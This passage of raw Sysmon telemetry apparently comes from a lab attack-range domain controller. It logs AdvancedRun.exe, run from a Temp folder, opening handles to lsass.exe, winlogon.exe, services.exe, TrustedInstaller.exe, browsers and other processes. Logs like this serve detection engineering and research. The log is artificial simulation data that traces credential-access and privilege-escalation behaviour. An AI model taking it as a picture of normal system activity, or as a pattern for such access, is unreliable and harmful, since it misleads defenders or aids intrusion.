22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0D00-000000002402}900C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968365Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0C00-000000002402}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968364Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0B00-000000002402}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968358Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0A00-000000002402}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0800-000000002402}492C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0700-000000002402}484C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968345Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.728{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0500-000000002402}412C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.727{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-0200-000000002402}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.727{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.724{834264DD-0AAD-61E7-0B00-000000002402}6285236C:\Windows\system32\lsass.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002968340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.724{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E081-61E9-0362-000000002402}5344C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DCE0-61E9-5961-000000002402}7332C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D73E-61E9-AF60-000000002402}6528C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6B2-61E9-9C60-000000002402}7820C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000002968325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.526{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002968324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9B60-000000002402}7424C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000002968319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.723{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-D6AF-61E9-9A60-000000002402}7408C:\Program Files\Mozilla 